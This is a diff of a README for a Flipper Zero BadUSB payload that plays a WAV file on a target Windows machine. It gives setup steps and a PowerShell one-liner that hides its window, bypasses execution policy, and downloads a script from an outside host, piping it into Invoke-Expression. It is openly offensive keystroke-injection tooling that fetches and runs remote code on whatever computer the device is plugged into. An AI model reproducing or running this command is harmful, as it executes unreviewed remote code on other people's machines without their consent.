I-Am-Jakoby/Flipper-Zero-BadUSB/Payloads/Flip-Play-WAV/README.md

 ### Dependencies

-* DropBox - Your Shared link for the intended file
 * Windows 10,11

 <p align="right">(<a href="#top">back to top</a>)</p>

 ### Executing program

+* Place the WAV Url in the $wav variable
 * Plug in your device
 * Invoke-WebRequest will be entered in the Run Box to download your WAV file

 ```
 powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex
 ```